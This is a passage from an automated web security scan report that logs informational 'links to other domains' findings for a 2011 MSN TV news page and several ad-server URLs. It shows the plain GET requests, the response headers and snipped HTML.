...[SNIP]...
</SCRIPT>
<link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css">
<link rel="stylesheet" type="text/css" href="http://entimg.msn.com/i/css/news_article_page_cntwmodule_08.css"/>
...[SNIP]...
<![endif]-->
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com" rel="">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb" rel="">MLB</a></li><li class=""><a href="http://msn.foxsports.com/nascar " rel="">NASCAR</a></li><li class=""><a href="http://msn.foxsports.com/nba" rel="">NBA</a></li><li class=""><a href="http://msn.foxsports.com/collegebasketball" rel="">NCAA Basketball</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/cfb" rel="">NCAA Football</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/nfl" rel=""><strong>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/nhl" rel="">NHL</a></li><li class=""><a href="http://msn.foxsports.com/fantasy" rel="">Play Fantasy</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/foxsoccer" rel="">Soccer</a></li><li class=""><a href="http://msn.foxsports.com/video?from=en-us_msnhp" rel="">Video Highlights</a>
...[SNIP]...
<li class=""><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" rel="">Careers & Jobs</a>
...[SNIP]...
<li class=""><a href="http://www.delish.com/" rel=""> Cooking</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " rel=""> Travel</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" rel="">Maps & Directions</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" rel="">Video</a>
...[SNIP]...
<li class=""><a href="http://insidemsn.wordpress.com" rel="">Corrections & Clarifications</a>
...[SNIP]...
<li class=""><a href="http://msn.whitepages.com/" rel="">White Pages</a>
...[SNIP]...
<li class=""><a href="http://www.delish.com/" rel="">Delish</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/shopping?FORM=SHOPH2" rel="">Shopping</a></li><li class=""><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" rel="">Feedback</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " rel="">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?Form=BC">Bing</a>
...[SNIP]...
<li id="first"><a href="http://mail.live.com">Hotmail</a><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406730&rver=5.5.4177.0&wp=MBI&wreply=http:%2F%2Ftv.redacted%2Ftv%2Farticle.aspx%3Fnews%3D625552%26gt1%3D28103&lc=1033&id=75104&cb=wreply%3dhttp%3a%2f%2ftv.redacted%2ftv%2farticle.aspx%3fnews%3d625552%26gt1%3d28103%26ppcb%3d">Sign in</a>
...[SNIP]...
<a href="http://www.redacted"><img id="msnLogo" src="http://entimg.s-msn.com/i/grandprix/msft.png" alt="MSN" style="border-width:0px;" /></a>
...[SNIP]...
<div class=""><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
</a><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div class="leftNav_content"><img class="leftNav_bg" src="http://entimg.s-msn.com/i/grandprix/leftNavBg.gif" style="border-width:0px;" /><div class="MoviesleftNav_linkDiv">
...[SNIP]...
<span class="leftNav_disabled"><img src='http://entimg.s-msn.com/i/grandprix/leftNavSeperator.gif' /></span>
...[SNIP]...
<a title="TV News" href="http://tv.redacted/rss/toptvnews"> <img src='http://entimg.s-msn.com/i/ms/RssIcon.gif' style='border-width:0px;' class='NewsRssIconClass'/></a>
...[SNIP]...
<div class="ArticleImageDivCss"> <img title="..AP Photo/Chris Pizzello, File" src="http://entimg.s-msn.com/i/150/News/May10/Charlie_Sheen_150.jpg" alt="Charlie Sheen" style="height:200px;width:150px;border-width:0px;" /><div class="ArticleCaptionCss">
...[SNIP]...
<P>LOS ANGELES (AP) -- The production of <a href=http://www.bing.com/search?q=Charlie+Sheen&form=msnena class="art">Charlie Sheen</a>
...[SNIP]...
</STRONG> <a href=http://www.bing.com/search?q=charlie+sheen%27s+woes&form=msnena class="art">Charlie Sheen's recent woes</a>
...[SNIP]...
<div class="newsToolBarCommentsIconDiv"><img src="http://entimg.s-msn.com/i/grandprix/discuss.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div class="newsToolBarMailIconDiv"><img src="http://entimg.s-msn.com/i/grandprix/mail.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div class="newsToolBarDiggIconDiv"><img src="http://entimg.s-msn.com/i/grandprix/Digg.gif" style="border-width:0px;" /></div>
...[SNIP]...
</style><a href='http://www.facebook.com/share.php?u=http%3a%2f%2ftv.redacted%2ftv%2farticle.aspx%3fnews%3d625552%26affid%3dfb' onclick='return fbs_click()' target='_blank' class='fb_share_link'>Facebook</a>
...[SNIP]...
<div class="newsToolBarSpacesIconDiv"><img src="http://entimg.s-msn.com/i/grandprix/spacesBlog.gif" style="border-width:0px;" /></div>
...[SNIP]...
<a title="RSS for "More TV News"" href="/rss/toptvnews"><img src="http://entimg.s-msn.com/i/ms/RssIcon.gif" style="border-width:0px;" /></a>
...[SNIP]...
<a title="RSS for "Just In News"" href="/rss/entnews"><img src="http://entimg.s-msn.com/i/ms/RssIcon.gif" style="border-width:0px;" /></a>
...[SNIP]...
<td class="adText"><a href="http://choice.live.com/default.aspx"><img src="http://blstc.redacted/br/chan/css/decoration/adchoicesv4.png"/>
...[SNIP]...
<td class="adText"><a href="http://choice.live.com/default.aspx"><img src="http://blstc.redacted/br/chan/css/decoration/adchoicesv4.png"/>
...[SNIP]...
<DIV class=GossipSummaryContentDiv><a href=http://www.bing.com/videos/browse/Sundance class="altlink"><STRONG>
...[SNIP]...
<div class="pageFooter_link"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_new">MSN Privacy</a>
...[SNIP]...
<div class="pageFooter_logo"><img id="microsoftLogo" src="http://entimg.s-msn.com/i/ms/ms_logo.gif" style="border-width:0px;" /></div>
...[SNIP]...
<noscript><img src="http://msnportalent.112.2O7.net/b/ss/msnportalent/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...
<script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...
</script><img id="clickTarget" style="display:none" src="http://entimg.s-msn.com/i/sp.gif" onReadyStateChange="if(SF('ctStateChange')) ctStateChange();" alt="" ></object>
...[SNIP]...

22.351. http://tv.redacted/tv/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tv.redacted
Path:	/tv/article.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://tv.redacted/tv/article.aspx?news=625552&gt1=28103

The response contains the following links to other domains:

http://choice.live.com/default.aspx
http://download.live.com/?sku=messenger
http://entcss.s-redacted/App_Themes/IE7/IE79613.css
http://entcss.s-redacted/styles/entertainment9613.css
http://entcss.s-redacted/styles/gtl_sitegeneric9613.css
http://entcss.s-redacted/styles/tvvertical9613.css
http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js
http://entimg.s-redacted/i/150/News/May10/Charlie_Sheen_150.jpg
http://entimg.s-redacted/i/grandprix/Digg.gif
http://entimg.s-redacted/i/grandprix/discuss.gif
http://entimg.s-redacted/i/grandprix/leftNavBg.gif
http://entimg.s-redacted/i/grandprix/leftNavSeperator.gif
http://entimg.s-redacted/i/grandprix/mail.gif
http://entimg.s-redacted/i/grandprix/msft.png
http://entimg.s-redacted/i/grandprix/nav_pipe.gif
http://entimg.s-redacted/i/grandprix/spacesBlog.gif
http://entimg.s-redacted/i/ms/RssIcon.gif
http://entimg.s-redacted/i/ms/ms_logo.gif
http://entimg.s-redacted/i/sp.gif
http://go.microsoft.com/fwlink/?LinkId=74170
http://help.live.com/resources/neutral/launchhelp.js
http://img.widgets.video.s-redacted/js/ch/channels.css
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalent.112.2o7.net/b/ss/msnportalent/1/H.1--NS/0
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/search?Form=BC
http://www.bing.com/search?q=Charlie+Sheen&form=msnena
http://www.bing.com/search?q=charlie+sheen%27s+woes&form=msnena
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse/Sundance?ocid=sdnews
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.facebook.com/share.php?u=http%3a%2f%2ftv.redacted%2ftv%2farticle.aspx%3fnews%3d625552%26affid%3dfb
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345100&rver=5.5.4177.0&wp=MBI&wreply=http:%2F%2Ftv.msn.com%2Ftv%2Farticle.aspx%3Fnews%3D625552%26gt1%3D28103&lc=1033&id=75104&cb=wreply%3dhttp%3a%2f%2ftv.redacted%2ftv%2farticle.aspx%3fnews%3d625552%26gt1%3d28103%26ppcb%3d
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /tv/article.aspx?news=625552&gt1=28103 HTTP/1.1
Host: tv.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 54757
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=62ae4f15c8c0486a828bffcaa09140f2; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:51:40 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Source: Sh
...[SNIP]...
<link rel="shortcut icon" href="http://blstc.msn.com/br/gbl/lg/1/favicon.ico" /><link rel="stylesheet" href="http://entcss.s-msn.com/styles/entertainment9613.css" rev="stylesheet" type="text/css"/><link rel="stylesheet" href="http://entcss.s-msn.com/styles/gtl_sitegeneric9613.css" rev="stylesheet" type="text/css"/>
<link rel="stylesheet" href="http://entcss.s-msn.com/styles/tvvertical9613.css" rev="stylesheet" type="text/css"/>

<style>
...[SNIP]...
</style>

<link rel="stylesheet" href="http://entcss.s-msn.com/App_Themes/IE7/IE79613.css" rev="stylesheet" type="text/css"/><SCRIPT language=JavaScript src="http://entimg.msn.com/i/jScript/addCSSandSCRIPTtoHEAD.js" type=text/javascript>
...[SNIP]...
</SCRIPT>
<link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css">
<link rel="stylesheet" type="text/css" href="http://entimg.msn.com/i/css/news_article_page_cntwmodule_08.css"/>
...[SNIP]...
<![endif]-->
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com" rel="">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb" rel="">MLB</a></li><li class=""><a href="http://msn.foxsports.com/nascar " rel="">NASCAR</a></li><li class=""><a href="http://msn.foxsports.com/nba" rel="">NBA</a></li><li class=""><a href="http://msn.foxsports.com/collegebasketball" rel="">NCAA Basketball</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/cfb" rel="">NCAA Football</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/nfl" rel=""><strong>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/nhl" rel="">NHL</a></li><li class=""><a href="http://msn.foxsports.com/fantasy" rel="">Play Fantasy</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/foxsoccer" rel="">Soccer</a></li><li class=""><a href="http://msn.foxsports.com/video?from=en-us_msnhp" rel="">Video Highlights</a>
...[SNIP]...
<li class=""><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" rel="">Careers & Jobs</a>
...[SNIP]...
<li class=""><a href="http://www.delish.com/" rel=""> Cooking</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " rel=""> Travel</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" rel="">Maps & Directions</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" rel="">Video</a>
...[SNIP]...
<li class=""><a href="http://insidemsn.wordpress.com" rel="">Corrections & Clarifications</a>
...[SNIP]...
<li class=""><a href="http://msn.whitepages.com/" rel="">White Pages</a>
...[SNIP]...
<li class=""><a href="http://www.delish.com/" rel="">Delish</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/shopping?FORM=SHOPH2" rel="">Shopping</a></li><li class=""><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" rel="">Feedback</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " rel="">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?Form=BC">Bing</a>
...[SNIP]...
<li id="first"><a href="http://mail.live.com">Hotmail</a><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345100&rver=5.5.4177.0&wp=MBI&wreply=http:%2F%2Ftv.redacted%2Ftv%2Farticle.aspx%3Fnews%3D625552%26gt1%3D28103&lc=1033&id=75104&cb=wreply%3dhttp%3a%2f%2ftv.redacted%2ftv%2farticle.aspx%3fnews%3d625552%26gt1%3d28103%26ppcb%3d">Sign in</a>
...[SNIP]...
<a href="http://www.redacted"><img id="msnLogo" src="http://entimg.s-msn.com/i/grandprix/msft.png" alt="MSN" style="border-width:0px;" /></a>
...[SNIP]...
<div class=""><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
</a><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div class="leftNav_content"><img class="leftNav_bg" src="http://entimg.s-msn.com/i/grandprix/leftNavBg.gif" style="border-width:0px;" /><div class="MoviesleftNav_linkDiv">
...[SNIP]...
<span class="leftNav_disabled"><img src='http://entimg.s-msn.com/i/grandprix/leftNavSeperator.gif' /></span>
...[SNIP]...
<a title="TV News" href="http://tv.redacted/rss/toptvnews"> <img src='http://entimg.s-msn.com/i/ms/RssIcon.gif' style='border-width:0px;' class='NewsRssIconClass'/></a>
...[SNIP]...
<div class="ArticleImageDivCss"> <img title="..AP Photo/Chris Pizzello, File" src="http://entimg.s-msn.com/i/150/News/May10/Charlie_Sheen_150.jpg" alt="Charlie Sheen" style="height:200px;width:150px;border-width:0px;" /><div class="ArticleCaptionCss">
...[SNIP]...
<P>LOS ANGELES (AP) -- The production of <a href=http://www.bing.com/search?q=Charlie+Sheen&form=msnena class="art">Charlie Sheen</a>
...[SNIP]...
</STRONG> <a href=http://www.bing.com/search?q=charlie+sheen%27s+woes&form=msnena class="art">Charlie Sheen's recent woes</a>
...[SNIP]...
<div class="newsToolBarCommentsIconDiv"><img src="http://entimg.s-msn.com/i/grandprix/discuss.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div class="newsToolBarMailIconDiv"><img src="http://entimg.s-msn.com/i/grandprix/mail.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div class="newsToolBarDiggIconDiv"><img src="http://entimg.s-msn.com/i/grandprix/Digg.gif" style="border-width:0px;" /></div>
...[SNIP]...
</style><a href='http://www.facebook.com/share.php?u=http%3a%2f%2ftv.redacted%2ftv%2farticle.aspx%3fnews%3d625552%26affid%3dfb' onclick='return fbs_click()' target='_blank' class='fb_share_link'>Facebook</a>
...[SNIP]...
<div class="newsToolBarSpacesIconDiv"><img src="http://entimg.s-msn.com/i/grandprix/spacesBlog.gif" style="border-width:0px;" /></div>
...[SNIP]...
<a title="RSS for "More TV News"" href="/rss/toptvnews"><img src="http://entimg.s-msn.com/i/ms/RssIcon.gif" style="border-width:0px;" /></a>
...[SNIP]...
<a title="RSS for "Just In News"" href="/rss/entnews"><img src="http://entimg.s-msn.com/i/ms/RssIcon.gif" style="border-width:0px;" /></a>
...[SNIP]...
<td class="adText"><a href="http://choice.live.com/default.aspx"><img src="http://blstc.redacted/br/chan/css/decoration/adchoicesv4.png"/>
...[SNIP]...
<td class="adText"><a href="http://choice.live.com/default.aspx"><img src="http://blstc.redacted/br/chan/css/decoration/adchoicesv4.png"/>
...[SNIP]...
<TD class=rp5 width=75 align=left><a href="http://www.bing.com/videos/browse/Sundance?ocid=sdnews " class="altlink"><IMG border=0 alt=Bing src="http://entimg.msn.com/i/140/ent/bingbar_140.jpg" width=140 height=101>
...[SNIP]...
<STRONG><a href="http://www.bing.com/videos/browse/Sundance?ocid=sdnews " class="altlink">Sundance 2011</a>
...[SNIP]...
<div class="pageFooter_link"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_new">MSN Privacy</a>
...[SNIP]...
<div class="pageFooter_logo"><img id="microsoftLogo" src="http://entimg.s-msn.com/i/ms/ms_logo.gif" style="border-width:0px;" /></div>
...[SNIP]...
<noscript><img src="http://msnportalent.112.2O7.net/b/ss/msnportalent/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...
<script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...
</script><img id="clickTarget" style="display:none" src="http://entimg.s-msn.com/i/sp.gif" onReadyStateChange="if(SF('ctStateChange')) ctStateChange();" alt="" ></object>
...[SNIP]...

22.352. http://redcated/CNT/iview/286609711/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://redcated
Path:	/CNT/iview/286609711/direct

Issue detail

The page was loaded from a URL containing a query string:

http://redcated/CNT/iview/286609711/direct;wi.300;hi.250/direct/01/181503410?click=http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=\

The response contains the following links to other domains:

http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=/http:/clk.redcated/go/286609711/direct;wi.300;hi.250;ai.198086410;ct.1/01
http://cdn.doubleverify.com/script44.js?agnc=607671&cmp=CINGCP913401CNT&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=2&plc=286609711&advid=607930&sid=286609711&adid=
http://t.mookie1.com/t/v1/imp?migAgencyId=234&migSource=atlas&migAtlAI=198086410&migRandom=141989623&migTagDesc=Cingular&migAtlSA=286609711&migAtlC=480d7815-42e6-4315-a737-64cdf14f8adc

Request

GET /CNT/iview/286609711/direct;wi.300;hi.250/direct/01/181503410?click=http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=\ HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7206
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 17:39:02 GMT
Connection: close

<html><head><title>110109_22_UTV_THDVR_29_100B_NOTAG_300x250</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-w
...[SNIP]...
<noscript>
<a target="_blank" href="http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=\http://clk.redcated/go/286609711/direct;wi.300;hi.250;ai.198086410;ct.1/01"><img border="0" src="HTTP://spe.redcated/ds/CJCNTCINGCP9/1_5_2010_customertargeting/110109_22_UTV_THDVR_29_100B_NOTAG_300x250.jpg?ver=1" width="300" height="250" />
...[SNIP]...
</noscript>
<script type="text/javascript" language="javascript" src="http://cdn.doubleverify.com/script44.js?agnc=607671&cmp=CINGCP913401CNT&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=2&plc=286609711&advid=607930&sid=286609711&adid="></script><img src="http://t.mookie1.com/t/v1/imp?migAgencyId=234&migSource=atlas&migAtlAI=198086410&migRandom=141989623&migTagDesc=Cingular&migAtlSA=286609711&migAtlC=480d7815-42e6-4315-a737-64cdf14f8adc" width="0" height="0" border="0" /></body>
...[SNIP]...

22.353. http://redcated/CNT/iview/286609711/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://redcated
Path:	/CNT/iview/286609711/direct

Issue detail

The page was loaded from a URL containing a query string:

http://redcated/CNT/iview/286609711/direct;wi.300;hi.250/direct/01/181503410?click=http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=

The response contains the following links to other domains:

http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=http:/clk.atdmt.com/go/286609711/direct;wi.300;hi.250;ai.198086410;ct.1/01
http://cdn.doubleverify.com/script44.js?agnc=607671&cmp=CINGCP913401CNT&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=2&plc=286609711&advid=607930&sid=286609711&adid=
http://t.mookie1.com/t/v1/imp?migAgencyId=234&migSource=atlas&migAtlAI=198086410&migRandom=384130361&migTagDesc=Cingular&migAtlSA=286609711&migAtlC=480d7815-42e6-4315-a737-64cdf14f8adc

Request

GET /CNT/iview/286609711/direct;wi.300;hi.250/direct/01/181503410?click=http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate= HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7201
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:29:43 GMT

<html><head><title>110109_22_UTV_THDVR_29_100B_NOTAG_300x250</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-w
...[SNIP]...
<noscript>
<a target="_blank" href="http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=http://clk.redcated/go/286609711/direct;wi.300;hi.250;ai.198086410;ct.1/01"><img border="0" src="HTTP://spe.redcated/ds/CJCNTCINGCP9/1_5_2010_customertargeting/110109_22_UTV_THDVR_29_100B_NOTAG_300x250.jpg?ver=1" width="300" height="250" />
...[SNIP]...
</noscript>
<script type="text/javascript" language="javascript" src="http://cdn.doubleverify.com/script44.js?agnc=607671&cmp=CINGCP913401CNT&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=2&plc=286609711&advid=607930&sid=286609711&adid="></script><img src="http://t.mookie1.com/t/v1/imp?migAgencyId=234&migSource=atlas&migAtlAI=198086410&migRandom=384130361&migTagDesc=Cingular&migAtlSA=286609711&migAtlC=480d7815-42e6-4315-a737-64cdf14f8adc" width="0" height="0" border="0" /></body>
...[SNIP]...

22.354. http://redcated/CNT/iview/286609711/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://redcated
Path:	/CNT/iview/286609711/direct

Issue detail

The page was loaded from a URL containing a query string:

http://redcated/CNT/iview/286609711/direct;wi.300;hi.250/direct/01/181503410?click=http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=\

The response contains the following links to other domains:

http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=/http:/clk.redcated/go/286609711/direct;wi.300;hi.250;ai.198086410;ct.1/01
http://cdn.doubleverify.com/script44.js?agnc=607671&cmp=CINGCP913401CNT&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=2&plc=286609711&advid=607930&sid=286609711&adid=
http://t.mookie1.com/t/v1/imp?migAgencyId=234&migSource=atlas&migAtlAI=198086410&migRandom=988724102&migTagDesc=Cingular&migAtlSA=286609711&migAtlC=480d7815-42e6-4315-a737-64cdf14f8adc

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7206
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:51:41 GMT
Connection: close

<html><head><title>110109_22_UTV_THDVR_29_100B_NOTAG_300x250</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-w
...[SNIP]...
<noscript>
<a target="_blank" href="http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=\http://clk.redcated/go/286609711/direct;wi.300;hi.250;ai.198086410;ct.1/01"><img border="0" src="HTTP://spe.redcated/ds/CJCNTCINGCP9/1_5_2010_customertargeting/110109_22_UTV_THDVR_29_100B_NOTAG_300x250.jpg?ver=1" width="300" height="250" />
...[SNIP]...
</noscript>
